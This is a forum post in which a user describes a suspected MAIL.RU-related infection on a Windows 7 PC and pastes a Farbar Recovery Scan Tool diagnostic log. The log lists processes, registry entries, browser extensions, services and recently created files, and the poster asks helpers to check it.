Another MAIL.RU victim here....


This topic is locked
8 replies to this topic

#1 Xaltotun

  • Members
  • 4 posts
  • OFFLINE
  • Local time: 07:32 PM

Posted 11 January 2018 - 03:11 AM

Hi, my name is Silver, and I have a similar problem, as some people have had here before. Got MAIL.RU with CMD download and blue screen on turnoff sometimes. Only difference is that I used Malwarebytes and Zemana for scan and they destroyed some of it. CMD download and blue screen on shutdown stayed. Then I was at work 24h; when I came back Avast found something (818424698.exe and trz2EAD.tmp) and chested those... So far CMD hasn't popped up. Can you please check whether I'm now good here :)

Presenting FRST results here :)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02.01.2018
Ran by Jahikas (administrator) on JAHIKAS-REAKTOR (11-01-2018 09:42:46)
Running from C:\Users\Jahikas\Desktop\FRST
Loaded Profiles: Jahikas & UpdatusUser (Available Profiles: Jahikas & UpdatusUser)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
() C:\Windows\runSW.exe
(Realtek) C:\Windows\SwUSB.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
() C:\Program Files (x86)\The4ThComing\t4c.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [246120 2017-12-22] (AVAST Software)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [15775888 2017-08-09] (Copyright 2017.)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [465544 2016-02-10] (Power Software Ltd)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-03-27] (Intel Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1345210596-781569937-2744199837-1000\...\MountPoints2: F - F:\AutoRunMorrowind.exe
HKU\S-1-5-21-1345210596-781569937-2744199837-1000\...\MountPoints2: G - G:\setup.exe
AppInit_DLLs: C:\Windows\Jaksta\AC\x64\jaudcap.dll => C:\Windows\Jaksta\AC\x64\jaudcap.dll [312096 2015-04-24] (Jaksta Technologies Pty Ltd)
AppInit_DLLs-x32: C:\Windows\Jaksta\AC\x86\jaudcap.dll => C:\Windows\Jaksta\AC\x86\jaudcap.dll [264992 2015-04-24] (Jaksta Technologies Pty Ltd)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{B03D2702-3AFB-4761-9FEE-8B3C0B97B21A}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{C222D609-84F4-4AFC-AEB9-A778F23A68BD}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?bcutc=sp-006
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1345210596-781569937-2744199837-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1345210596-781569937-2744199837-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1345210596-781569937-2744199837-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-11-09] (AVAST Software)
BHO-x32: IE Token Signing Plugin -> {2A4E94A4-B275-491A-9E32-CD7A26FC7C3B} -> C:\Program Files\Open-EID\esteid-plugin-ie.dll [2017-10-16] (RIA)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-11-09] (AVAST Software)

FireFox:
========
FF DefaultProfile: krkz2nio.default-1500317088253
FF ProfilePath: C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 [2018-01-11]
FF user.js: detected! => C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\user.js [2014-05-14]
FF Homepage: Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 -> about:home
FF NetworkProxy: Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 -> type", 0
FF Session Restore: Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 -> is enabled.
FF Extension: (Yahoo) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\@yset.xpi [2017-10-31]
FF Extension: (Ant Video downloader) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\anttoolbar@ant.com.xpi [2018-01-05]
FF Extension: (NetVideoHunter) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\netvideohunter@netvideohunter.com [2017-07-17] [Legacy]
FF Extension: (The Addon Bar (restored)) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\the-addon-bar@GeekInTraining-GiT.xpi [2016-05-04] [Legacy]
FF Extension: (Adblock Plus) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-12-13]
FF Extension: (SearchPreview) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\{EF522540-89F5-46b9-B6FE-1829E2B572C6}.xpi [2017-08-24]
FF HKLM\...\Firefox\Extensions: [{443830f0-1fff-4f9a-aa1e-444bafbc7319}] - C:\Program Files (x86)\Open-EID\\{443830f0-1fff-4f9a-aa1e-444bafbc7319}.xpi
FF Extension: (Token signing) - C:\Program Files (x86)\Open-EID\\{443830f0-1fff-4f9a-aa1e-444bafbc7319}.xpi [2017-10-16]
FF HKLM\...\Firefox\Extensions: [{aa84ce40-4253-a00a-8cd6-0800200f9a67}] - C:\Program Files\Open-EID\\{aa84ce40-4253-a00a-8cd6-0800200f9a67}.xpi
FF Extension: (PKCS11 loader) - C:\Program Files\Open-EID\\{aa84ce40-4253-a00a-8cd6-0800200f9a67}.xpi [2017-10-04] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [{443830f0-1fff-4f9a-aa1e-444bafbc7319}] - C:\Program Files (x86)\Open-EID\\{443830f0-1fff-4f9a-aa1e-444bafbc7319}.xpi
FF HKLM-x32\...\Firefox\Extensions: [{aa84ce40-4253-a00a-8cd6-0800200f9a67}] - C:\Program Files\Open-EID\\{aa84ce40-4253-a00a-8cd6-0800200f9a67}.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_137.dll [2018-01-09] ()
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-11-29] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-11-29] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-11-29] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_137.dll [2018-01-09] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2012-10-02] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2012-10-02] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-11-04] (Adobe Systems Inc.)

Chrome:
=======
CHR HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ckjefchnfjhjfedoccjbhjpbncimppeg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7538536 2017-12-22] (AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [301168 2017-12-22] (AVAST Software)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 RunSwUSB; C:\Windows\runSW.exe [44760 2014-12-12] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-06-12] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [15775888 2017-08-09] (Copyright 2017.)
S2 RTLDHCPService; C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 appliand; C:\Windows\System32\DRIVERS\appliand.sys [30304 2014-11-28] (Applian Technologies Inc.)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [185096 2017-12-22] (AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdrivera.sys [321512 2017-12-22] (AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsha.sys [199448 2017-12-22] (AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswbloga.sys [343768 2017-12-22] (AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniva.sys [57696 2017-12-22] (AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [149344 2017-12-22] (AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [46976 2017-12-22] (AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [146648 2018-01-10] (AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110336 2017-12-22] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84384 2017-12-22] (AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [1025176 2017-12-22] (AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [457896 2018-01-10] (AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [204456 2017-12-22] (AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [358672 2017-12-22] (AVAST Software)
S3 atrfiltr; C:\Windows\System32\DRIVERS\atrfiltr.sys [24968 2016-03-08] (Windows ® Win 7 DDK provider)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-08-07] (Intel Corporation)
R3 jakstaVA; C:\Windows\System32\DRIVERS\jaksta_va.sys [103816 2014-12-09] (e2eSoft)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 VUSB3HUB; C:\Windows\System32\DRIVERS\ViaHub3.sys [231112 2013-01-03] (VIA Technologies, Inc.)
R3 xhcdrv; C:\Windows\System32\DRIVERS\xhcdrv.sys [301256 2013-01-03] (VIA Technologies, Inc.)
R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2018-01-10] (Zemana Ltd.)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2018-01-10] (Zemana Ltd.)
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-01-11 09:42 - 2018-01-11 09:42 - 000000000 ____D C:\Users\Jahikas\Desktop\FRST
2018-01-11 09:42 - 2018-01-11 09:42 - 000000000 ____D C:\FRST
2018-01-11 08:36 - 2018-01-11 08:36 - 000000000 ___HD C:\$AV_ASW
2018-01-11 08:32 - 2018-01-11 08:32 - 000000000 ____D C:\ProgramData\SWCUTemp
2018-01-10 03:37 - 2018-01-11 09:42 - 000059263 _____ C:\Windows\ZAM.krnl.trace
2018-01-10 03:37 - 2018-01-11 09:42 - 000026893 _____ C:\Windows\ZAM_Guard.krnl.trace
2018-01-10 03:37 - 2018-01-10 03:37 - 000203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zamguard64.sys
2018-01-10 03:37 - 2018-01-10 03:37 - 000203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zam64.sys
2018-01-10 03:37 - 2018-01-10 03:37 - 000001148 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2018-01-10 03:37 - 2018-01-10 03:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2018-01-10 03:37 - 2018-01-10 03:37 - 000000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2018-01-10 03:35 - 2018-01-10 03:35 - 000000000 ____D C:\Users\Jahikas\AppData\Local\Zemana
2018-01-10 03:30 - 2018-01-10 03:31 - 006625600 _____ (Zemana Ltd. ) C:\Users\Jahikas\Downloads\Zemana.AntiMalware.Setup.exe
2018-01-10 02:59 - 2018-01-10 02:59 - 947798725 _____ C:\Windows\MEMORY.DMP
2018-01-10 02:59 - 2018-01-10 02:59 - 000291528 _____ C:\Windows\Minidump\011018-10389-01.dmp
2018-01-10 01:34 - 2018-01-11 08:35 - 000003478 _____ C:\Windows\System32\Tasks\hYOuioDYluo
2018-01-10 01:34 - 2018-01-10 06:51 - 000003294 _____ C:\Windows\System32\Tasks\SyHTyUPcnUkIY
2018-01-10 01:34 - 2018-01-10 01:34 - 000003616 _____ C:\Windows\System32\Tasks\PSEWDZ
2018-01-10 01:34 - 2018-01-10 01:34 - 000000001 _____ C:\Users\Jahikas\AppData\Local\WMI.ini
2018-01-10 01:34 - 2016-06-12 13:42 - 000073216 _____ (Microsoft Corporation) C:\Users\Jahikas\oFIF.exe
2018-01-10 01:34 - 2010-11-21 05:24 - 000186368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Yugjm.exe
2018-01-10 01:34 - 2009-07-14 03:14 - 000001162 _____ C:\Users\Jahikas\AppData\Roaming\YoEb
2018-01-10 01:34 - 2009-07-14 03:14 - 000001129 _____ C:\Program Files (x86)\HXFiYSAfe
2018-01-10 01:34 - 2009-07-14 03:14 - 000000067 _____ C:\Program Files (x86)\bFmsiuYoOoOvL
2018-01-10 01:34 - 2009-07-14 03:14 - 000000062 _____ C:\Windows\SysWOW64\hicAAmW
2018-01-10 01:33 - 2018-01-10 03:04 - 000000000 ____D C:\Users\Jahikas\Downloads\DiRT Rally [FitGirl Repack]
2018-01-05 20:25 - 2018-01-05 20:25 - 000000000 ____D C:\Users\Jahikas\AppData\Roaming\Ant.com
2017-12-22 09:18 - 2017-12-22 09:18 - 000365680 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-12-22 09:18 - 2017-12-22 09:18 - 000149344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHdsKe.sys
2017-12-12 11:45 - 2017-12-12 11:46 - 000000000 ____D C:\Users\Jahikas\Desktop\navigin

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-01-11 09:40 - 2017-07-17 20:43 - 000000000 ____D C:\Program Files\Mozilla Firefox
2018-01-11 08:45 - 2016-11-07 21:51 - 000000871 _____ C:\Users\Public\Desktop\VLC media player.lnk
2018-01-11 08:42 - 2016-11-07 13:43 - 000000000 ____D C:\Users\Jahikas
2018-01-11 08:40 - 2009-07-14 06:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-01-11 08:40 - 2009-07-14 06:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-01-11 08:38 - 2016-11-15 22:30 - 000000000 ____D C:\Users\Jahikas\AppData\LocalLow\Mozilla
2018-01-11 08:37 - 2009-07-14 07:13 - 000783114 _____ C:\Windows\system32\PerfStringBackup.INI
2018-01-11 08:37 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2018-01-11 08:32 - 2016-11-07 21:27 - 000000000 ____D C:\ProgramData\NVIDIA
2018-01-11 08:32 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-01-10 21:18 - 2016-11-07 18:27 - 000457896 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2018-01-10 21:18 - 2016-11-07 18:27 - 000146648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2018-01-10 15:21 - 2017-03-18 04:33 - 000004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2018-01-10 07:48 - 2016-11-07 21:27 - 000000000 ____D C:\Users\UpdatusUser
2018-01-10 07:12 - 2016-11-09 21:58 - 000000000 ____D C:\Users\Jahikas\AppData\Roaming\uTorrent
2018-01-10 02:59 - 2017-03-27 14:21 - 000000000 ____D C:\Windows\Minidump
2018-01-10 01:37 - 2016-11-07 21:51 - 000000000 ____D C:\Users\Jahikas\AppData\Roaming\vlc
2018-01-10 01:33 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2018-01-09 14:12 - 2016-11-07 21:59 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-01-09 14:12 - 2016-11-07 21:59 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-01-09 14:12 - 2016-11-07 21:59 - 000004312 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2018-01-09 14:12 - 2016-11-07 21:59 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-01-09 14:12 - 2016-11-07 21:59 - 000000000 ____D C:\Windows\system32\Macromed
2018-01-07 01:39 - 2017-07-11 09:55 - 000007601 _____ C:\Users\Jahikas\AppData\Local\Resmon.ResmonCfg
2018-01-06 19:38 - 2016-11-13 13:03 - 000000000 ____D C:\Users\Jahikas\Downloads\Ant Videos
2018-01-06 16:50 - 2017-07-17 20:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-01-05 17:27 - 2016-11-07 23:53 - 000000000 ____D C:\Users\Jahikas\Desktop\SX 50
2018-01-05 17:19 - 2016-11-14 16:48 - 000009192 _____ C:\Users\Jahikas\Desktop\SX50  Linnud 2013+2014 +2015.txt
2017-12-27 14:32 - 2016-11-10 19:48 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-12-27 14:32 - 2016-11-07 19:07 - 000003904 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1478538427
2017-12-27 14:32 - 2016-11-07 18:27 - 000000000 ____D C:\Windows\System32\Tasks\AVAST Software
2017-12-22 09:18 - 2017-11-09 20:15 - 000185096 _____ (AVAST Software) C:\Windows\system32\Drivers\aswArPot.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000343768 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbloga.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000321512 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000199448 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsha.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000057696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbuniva.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 001025176 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000358672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000204456 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000110336 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000084384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000046976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-12-16 11:33 - 2016-11-07 20:53 - 000034292 _____ C:\Users\Jahikas\Desktop\märkmik.txt

==================== Files in the root of some directories =======

2018-01-10 01:34 - 2016-06-12 13:42 - 000073216 _____ (Microsoft Corporation) C:\Users\Jahikas\oFIF.exe
2018-01-10 01:34 - 2009-07-14 03:14 - 000000067 _____ () C:\Program Files (x86)\bFmsiuYoOoOvL
2009-07-14 03:14 - 2009-07-14 03:14 - 000000067 _____ () C:\Program Files (x86)\bFmsiuYoOoOvL.bat
2018-01-10 01:34 - 2009-07-14 03:14 - 000001129 _____ () C:\Program Files (x86)\HXFiYSAfe
2009-07-14 03:14 - 2009-07-14 03:14 - 000001129 _____ () C:\Program Files (x86)\HXFiYSAfe.bat
2018-01-10 01:34 - 2009-07-14 03:14 - 000001162 _____ () C:\Users\Jahikas\AppData\Roaming\YoEb
2009-07-14 03:14 - 2009-07-14 03:14 - 000001162 _____ () C:\Users\Jahikas\AppData\Roaming\YoEb.bat
2017-07-11 09:55 - 2018-01-07 01:39 - 000007601 _____ () C:\Users\Jahikas\AppData\Local\Resmon.ResmonCfg
2018-01-10 01:34 - 2018-01-10 01:34 - 000000001 _____ () C:\Users\Jahikas\AppData\Local\WMI.ini

Some files in TEMP:
====================
2018-01-10 07:49 - 2018-01-10 07:49 - 000388418 ____N (                                                            ) C:\Users\Jahikas\AppData\Local\Temp\1190520533.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-01-08 03:15

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by Jahikas (11-01-2018 09:43:03)
Running from C:\Users\Jahikas\Desktop\FRST
Windows 7 Ultimate Service Pack 1 (X64) (2016-11-07 11:42:41)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1345210596-781569937-2744199837-500 - Administrator - Disabled)
Guest (S-1-5-21-1345210596-781569937-2744199837-501 - Limited - Disabled)
Jahikas (S-1-5-21-1345210596-781569937-2744199837-1000 - Administrator - Enabled) => C:\Users\Jahikas
UpdatusUser (S-1-5-21-1345210596-781569937-2744199837-1001 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1345210596-781569937-2744199837-1000\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.)
